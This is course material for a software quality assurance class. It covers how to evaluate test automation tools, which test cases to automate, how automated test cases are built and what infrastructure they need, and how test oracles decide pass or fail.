6. GUI Testing Capability Criteria: An automated GUI test tool shouldinclude a record/playback feature which allows the test engineers to create,modify, and run automated tests across many environments. These tools shouldhave a capability to recognize and deal with all types of GUI objects, such aslist boxes, radio buttons, icons, joysticks, hot keys, and bit-map images withchanges in color shades and presentation fonts. The recording activity of the toolcapturing the keystrokes entered by the test engineer can be represented as scriptsin a high-level programming language and saved for future replay. The tools mustallow test engineers to modify test scripts to create reusable test procedures to beplayed back on a new software image for comparison. The performance of a GUItest tool needs to be evaluated. One may consider the question: How fast can thetool record and playback a complex test scenario or a group of test scenarios?

7. Vendor Qualification Criteria: Many questions need to be asked about thevendor’s financial stability, age of the vendor company, and its capability to supportthe tool. The vendor must be willing to fix problems that arise with the tool. Afuture roadmap must exist for the product. Finally, the maturity and market shareof the product must be evaluated.

8. Pricing Criteria: Pricing is an important aspect of the product evaluationcriteria. One can ask a number of questions: Is the price competitive? Is it within theestimated price range for an initial tool purchase? For a large number of licenses,a pricing discount can be negotiated with the vendor. Finally, the license mustexplicitly cap the maintenance cost of the test tool from year to year.

Tool vendors may guarantee the functionality of the test tool; however, expe-rience shows that often test automation tools do not work as expected within theparticular test environment. Therefore, it is recommended to evaluate the test toolby using it before making the decision to purchase it. The test team leader needsto contact the tool vendor to request a demonstration. After a demonstration of thetool, if the test team believes that the tool holds potential, then the test team leadermay ask for a temporary license of the tool for evaluation. At this point enoughresources are allocated to evaluate the test tool. The evaluator should have a clearunderstanding of the tool requirements and should make a test evaluation planbased on the criteria outlined previously. The goal here is to ensure that the testtool performs as advertised by the vendor and that the tool is the best product forthe requirement. Following the hands-on evaluation process, an evaluation reportis prepared. The report documents the hands-on experience with the tool. Thisreport should contain background information, a tool summary, technical findings,and a conclusion. This document is designed to address the management concernsbecause eventually it has to be approved by executive management.

12.12 TEST SELECTION GUIDELINESFOR AUTOMATION

Test cases should be automated only if there is a clear economic benefit over manualexecution. Some test cases are easy to automate while others are more cumbersome.


The general guideline shown in Figure 12.4 may be used in evaluating the suitabilityof test cases to be automated as follows:

Less Volatile: A test case is stable and is unlikely to change over time. Thetest case should have been executed manually before. It is expected thatthe test steps and the pass–fail criteria are not likely to change any more.

Repeatability : Test cases that are going to be executed several times shouldbe automated. However, one-time test cases should not be considered forautomation. Poorly designed test cases which tend to be difficult to reuseare not economical for automation.

High Risk : High-risk test cases are those that are routinely rerun after everynew software build. The objectives of these test cases are so important thatone cannot afford to not reexecute them. In some cases the propensity ofthe test cases to break is very high. These test cases are likely to be fruitfulin the long run and are the right candidates for automation.

Easy to Automate: Test cases that are easy to automate using automation toolsshould be automated. Some features of the system are easier to test thanother features, based on the characteristics of a particular tool. Customobjects with graphic and sound features are likely to be more expensiveto automate.

Manually Difficult : Test cases that are very hard to execute manually shouldbe automated. Manual test executions are a big problem, for example,causing eye strain from having to look at too many screens for too long in aGUI test. It is strenuous to look at transient results in real-time applications.These nasty, unpleasant test cases are good candidates for automation.

Boring and Time Consuming : Test cases that are repetitive in nature andneed to be executed for longer periods of time should be automated. Thetester’s time should be utilized in the development of more creative andeffective test cases.

Less volatile

Repeatability

High risk

Easy to automate

Manually dificult

Boring and timeconsuming

Guidelinesfor test

automation

Figure 12.4 Test selection guideline for automation.

12.13 CHARACTERISTICS OF AUTOMATED TEST CASES 397

12.13 CHARACTERISTICS OF AUTOMATEDTEST CASES

The largest component of test case automation is programming. Unless test cases aredesigned and coded properly, their execution and maintenance may not be effective.The design characteristics of effective test cases were discussed in Chapter 11. Aformal model of a standard test case schema was also provided in Chapter 11. Inthis section, we include some key points which are pertinent to the coding of testcases. The characteristics of good automated test cases are given in Figure 12.5and explained in the following.

1. Simple: The test case should have a single objective. Multiobjective testcases are difficult to understand and design. There should not be more than 10–15test steps per test case, excluding the setup and cleanup steps. Multipurpose testcases are likely to break or give misleading results. If the execution of a complextest leads to a system failure, it is difficult to isolate the cause of the failure.

2. Modular: Each test case should have a setup and cleanup phase beforeand after the execution test steps, respectively. The setup phase ensures that theinitial conditions are met before the start of the test steps. Similarly, the cleanupphase puts the system back in the initial state, that is, the state prior to setup. Eachtest step should be small and precise. One input stimulus should be provided to thesystem at a time and the response verified (if applicable) with an interim verdict.The test steps are building blocks from reusable libraries that are put together toform multistep test cases.

3. Robust and Reliable: A test case verdict (pass–fail) should be assigned insuch a way that it should be unambiguous and understandable. Robust test casescan ignore trivial failures such as one-pixel mismatch in a graphical display. Careshould be taken so that false test results are minimized. The test cases must havebuilt-in mechanisms to detect and recover from errors. For example, a test case

Simple

Modular

Robustand reliable

Reusable

Maintainable

Documented

Independent andself-sufficient

Characteristics

Figure 12.5 Characteristics of automated test cases.


need not wait indefinitely if the SUT has crashed. Rather, it can wait for a whileand terminate an indefinite wait by using a timer mechanism.

4. Reusable: The test steps are built to be configurable, that is, variablesshould not be hard coded. They can take values from a single configurable file.Attention should be given while coding test steps to ensure that a single globalvariable is used, instead of multiple, decentralized, hard-coded variables. Test stepsare made as independent of test environments as possible. The automated test casesare categorized into different groups so that subsets of test steps and test cases canbe extracted to be reused for other platforms and/or configurations. Finally, in GUIautomation hard-coded screen locations must be avoided.

5. Maintainable: Any changes to the SUT will have an impact on the auto-mated test cases and may require necessary changes to be done to the affectedtest cases. Therefore, it is required to conduct an assessment of the test cases thatneed to be modified before an approval of the project to change the system. Thetest suite should be organized and categorized in such a way that the affectedtest cases are easily identified. If a particular test case is data driven, it is recom-mended that the input test data be stored separately from the test case and accessedby the test procedure as needed. The test cases must comply with coding stan-dard formats. Finally, all the test cases should be controlled with a version controlsystem.

6. Documented: The test cases and the test steps must be well documented.Each test case gets a unique identifier, and the test purpose is clear and under-standable. Creator name, date of creation, and the last time it was modified mustbe documented. There should be traceability to the features and requirements beingchecked by the test case. The situation under which the test case cannot be used isclearly described. The environment requirements are clearly stated with the sourceof input test data (if applicable). Finally, the result, that is, pass or fail, evaluationcriteria are clearly described.

7. Independent and Self-Sufficient: Each test case is designed as a cohesiveentity, and test cases should be largely independent of each other. Each test caseconsists of test steps which are naturally linked together. The predecessor andsuccessor of a test step within a test case should be clearly understood. It is usefulto keep the following three independence rules while automating test cases:

• Data value independent: The possible corruption of data associated withone test case should have no impact on other test cases.

• Failure independent: The failure of one test case should not cause a rippleof failures among a large number of subsequent test cases.

• Final state independent: The state in which the environment is left by atest case should have no impact on test cases to be executed later.

We must take into consideration the characteristics outlined in this sectionduring the development of test scripts. In addition, we must obey the syntax of thetest case defined in the next section while implementing a test case.

12.14 STRUCTURE OF AN AUTOMATED TEST CASE 399

12.14 STRUCTURE OF AN AUTOMATED TEST CASE

An automated test case mimics the actions of a human tester in terms of creatinginitial conditions to execute the test, entering the input data to drive the test,capturing the output, evaluating the result, and finally restoring the system backto its original state. The six major steps in an automated test case are shown inFigure 12.6. Error handling routines are incorporated in each step to increase themaintainability and stability of test cases.

Setup: The setup includes steps to check the hardware, network environment,software configuration, and that the SUT is running. In addition, all theparameters of the SUT that are specific to the test case are configured.Other variables pertinent to the test case are initialized.

Drive the Test : The test is driven by providing input data to the SUT. It canbe a single step or multiple steps. The input data should be generated insuch a way that the SUT can read, understand, and respond.

Capture the Response: The response from the SUT is captured and saved.Manipulation of the output data from the system may be required to extractthe information that is relevant to the objective of the test case.

Determine the Verdict : The actual outcome is compared with the expectedoutcome. Predetermined decision rules are applied to evaluate any dis-crepancies between the actual outcome against the expected outcome anddecide whether the test result is a pass or a fail. If a fail verdict is assignedto the test case, additional diagnostic information is needed. One must becareful in designing the rules for assigning a passed/failed verdict to atest case. A failed test procedure does not necessarily indicate a problemwith the SUT—the problem could be a false positive. Similarly, a passedtest procedure does not necessarily indicate that there is no problem withthe SUT—the problem could be due to a false negative. The problemsof false negative and false positive can occur due to several reasons,

Setup

Drive the test

Capture theresponse

Determine theverdict

Log the verdict

Cleanup

Steps in anautomatedtest case

Figure 12.6 Six major steps in automated test case.


such as setup errors, test procedure errors, test script logic errors, or usererrors [18].

Log the Verdict : A detailed record of the results are written in a log file. Ifthe test case failed, additional diagnostic information is needed, such asenvironment information at the time of failure, which may be useful inreproducing the problem later.

Cleanup: A cleanup action includes steps to restore the SUT to its originalstate so that the next test case can be executed. The setup and cleanup stepswithin the test case need to be efficient in order to reduce the overhead oftest execution.

12.15 TEST AUTOMATION INFRASTRUCTURE

A test automation infrastructure, or framework, consists of test tools, equipment,test scripts, procedures, and people needed to make test automation efficient andeffective. The creation and maintenance of a test automation framework are key tothe success of any test automation project within an organization. The implemen-tation of an automation framework generally requires an automation test group, asdiscussed in Chapter 16. The six components of a test automation framework areshown in Figure 12.7. The idea behind an automation infrastructure is to ensurethe following:

• Different test tools and equipment are coordinated to work together.

• The library of the existing test case scripts can be reused for different testprojects, thus minimizing the duplication of development effort.

• Nobody creates test scripts in their own ways.

• Consistency is maintained across test scripts.

• The test suite automation process is coordinated such that it is availablejust in time for regression testing.

• People understand their responsibilities in automated testing.

System to Be Tested : This is the first component of an automation infrastruc-ture. The subsystems of the system to be tested must be stable; otherwisetest automation will not be cost effective. As an example, the 1xEV-DOsystem described in Chapter 8 consists of three subsystems, BTS, BSC,and EMS. All three subsystems must be stable and work together as awhole before the start of an automation test project.

Test Platform: The test platform and facilities, that is, the network setupon which the system will be tested, must be in place to carry out thetest automation project. For example, a procedure to download the imageof the SUT, configuration management utilities, servers, clients, routers,switches, and hubs are necessary to set up the automation environment toexecute the test scripts.

12.15 TEST AUTOMATION INFRASTRUCTURE 401

System tobe tested

Testplatform

Testlibrary

Automatedtesting

practices

Tools

Administrator

Components

Figure 12.7 Components of automa-tion infrastructure.

Test Case Library : It is useful to compile libraries of reusable test steps ofbasic utilities to be used as the building blocks of automated test scripts.Each utility typically performs a distinct task to assist the automation oftest cases. Examples of such utilities are ssh (secure shell) from client toserver, exit from client to server, response capture, information extraction,rules for verdicts, verdict logging, error logging, cleanup, and setup.

Automated Testing Practices : The procedures describing how to automatetest cases using test tools and test case libraries must be documented. Atemplate of an automated test case is useful in order to have consistencyacross all the automated test cases developed by different engineers. A listof all the utilities and guidelines for using them will enable us to havebetter efficiency in test automation. In addition, the maintenance procedurefor the library must be documented.

Tools : Different types of tools are required for the development of test scripts.Examples of such tools are test automation tool, traffic generation tool,traffic monitoring tool, and support tool. The support tools include test fac-tory, requirement analysis, defect tracking, and configuration managementtools. Integration of test automation and support tools, such as defect track-ing, is crucial for the automatic reporting of defects for failed test cases.Similarly, the test factory tool can generate automated test execution trendsand result patterns.

Administrator : The automation framework administrator (i) manages testcase libraries, test platforms, and test tools; (ii) maintains the inventory oftemplates; (iii) provides tutorials; and (iv) helps test engineers in writingtest scripts using the test case libraries. In addition, the administrator pro-vides tutorial assistance to the users of test tools and maintains a liaisonwith the tool vendors and the users.

Test oracles

An oracle is a mechanism for determining whether the program has passed or failed a test.

A complete oracle would have three capabilities and would carry them out perfectly:

• A generator, to provide predicted or expected results for each test. • A comparator, to compare predicted and obtained results. • An evaluator, to determine whether the comparison results are sufficiently

close to be a pass.

One of the key problems with oracles is that they can only address a small subset of the inputs and outputs actually associated with any test. The tester might intentionally set the values of some variables, but all of the program's other variables have values too. Configuration settings, amount of available memory, and program options can also affect the test results. As a result, our evaluation of the test results (that we look at) in terms of the test inputs (that we set intentionally) is based on incomplete data, and may be incorrect.

Any of the oracle capabilities may be automated. For example, we might generate predictions for a test from previous test results on this program, from the behavior of a previous release of this program or a competitor's program, from a standard function or from a custom model. We might generate these by hand, by a tool that feeds input to the reference program and captures output or by something that combines automated and manual testing. We might instead generate predictions from specifications, advertised claims, regulatory requirements or other sources of information that require a human to evaluate the information in order to generate the prediction.

A test oracle is a mechanism; different from the program itself that can be used to check the correctness of the output of the program for the test cases. Conceptually, we can consider testing a process in which the test cases are given to the test oracle and the program under testing.

The output of the two is then compared to determine if the program behaved correctly for test cases. To help the oracle determine the correct behavior, it is important that the behavior of the system or component be unambiguously specified and that the specification itself is error free.

There are some systems where oracles are automatically generated from specifications of programs or modules. With such oracles, we are assured that the output of the oracle is consistent with the specifications.

It is little use to execute a test suite automatically if execution results must be manually inspected to apply a pass/fail criterion. Relying on human intervention to judge test outcomes is not merely expensive, but also unreliable. Even the most conscientious and hard-working person cannot maintain the level of attention required to identify one failure in a hundred program executions, little more one or ten thousand. That is a job for a computer.

Software that applies a pass/fail criterion to a program execution is called a test oracle, often shortened to oracle. In addition to rapidly classifying a large number of test case executions, automated test oracles make it possible to classify behaviors that exceed human capacity in other ways, such as checking real-time response against latency requirements or dealing with voluminous output data in a machine-readable rather than human-readable form.

Ideally, a test oracle would classify every execution of a correct program as passing and would detect every program failure. In practice, the pass/fail criterion is usually imperfect. A test oracle may apply a pass/fail criterion that reflects only part of the actual program specification, or is an approximation, and therefore passes some program executions it ought to fail. Several partial test oracles (perhaps applied with different parts of the test suite) may be more cost-effective than one that is more comprehensive. A test oracle may also give false alarms, failing an execution that it ought to pass. False alarms in test execution are highly undesirable, not only because of the direct expense of manually checking them, but because they make it likely that real failures will be overlooked. Nevertheless sometimes the best we can obtain is an oracle that detects deviations from expectation that may or may not be actual failures.

One approach to judging correctness - but not the only one - compares the actual output or behavior of a program with predicted output or behavior. A test case with a comparison-based oracle relies on predicted output that is either precomputed as part of the test case specification or can be derived in some way independent of the program under test. Precomputing expected test results is reasonable for a small number of relatively simple test cases, and is still preferable to manual inspection of program results because the expense of producing (and debugging) predicted results is incurred once and amortized over many executions of the test case.

Support for comparison-based test oracles is often included in a test harness program or testing framework. A harness typically takes two inputs: (1) the input to the program under test (or can be mechanically transformed to a well-formed input), and (2) the predicted output. Frameworks for writing test cases as program code likewise provide support for comparison-based oracles.

Comparison-based oracles are useful mainly for small, simple test cases, but sometimes expected outputs can also be produced for complex test cases and large test suites. Capture-replay testing, a special case of this in which the predicted output or behavior is preserved from an earlier execution, is discussed in this chapter. A related approach is to capture the output of a trusted alternate version of the program under test. For example, one may produce output from a trusted implementation that is for some reason unsuited for production use; it may too slow or may depend on a component that is not available in the production environment. It is not even necessary that the alternative implementation be more reliable than the program under test, as long as it is sufficiently different that the failures of the real and alternate version are likely to be independent, and both are sufficiently reliable that not too much time is wasted determining which one has failed a particular test case on which they disagree.

Figure 17.2: A test harness with a comparison-based test oracle processes test cases consisting of (program input, predicted output) pairs.

A third approach to producing complex (input, output) pairs is sometimes possible: It may be easier to produce program input corresponding to a given output than vice versa. For example, it is simpler to scramble a sorted array than to sort a scrambled array.

A common misperception is that a test oracle always requires predicted program output to compare to the output produced in a test execution. In fact, it is often possible to judge output or behavior without predicting it. For example, if a program is required to find a bus route from station A to station B, a test oracle need not independently compute the route to ascertain that it is in fact a valid route that starts at A and ends at B.

Oracles that check results without reference to a predicted output are often partial, in the sense that they can detect some violations of the actual specification but not others. They check necessary but not sufficient conditions for correctness. For example, if the specification calls for finding the optimum bus route according to some metric, partial oracle a validity check is only a partial oracle because it does not check optimality. Similarly, checking that a sort routine produces sorted output is simple and cheap, but it is only a partial oracle because the output is also required to be a permutation of the input. A cheap partial oracle that can be used for a large

number of test cases is often combined with a more expensive comparison-based oracle that can be used with a smaller set of test cases for which predicted output has been obtained.

Ideally, a single expression of a specification would serve both as a work assignment and as a source from which useful test oracles were automatically derived. Specifications are often incomplete, and their informality typically makes automatic derivation of test oracles impossible. The idea is nonetheless a powerful one, and wherever formal or semiformal specifications (including design models) are available, it is worthwhile to consider whether test oracles can be derived from them. Some of the effort of formalization will be incurred either early, in writing specifications, or later when oracles are derived from them, and earlier is usually preferable.

CP 7026 - Software Quality Assurance

Engineering

Transcript of CP 7026 - Software Quality Assurance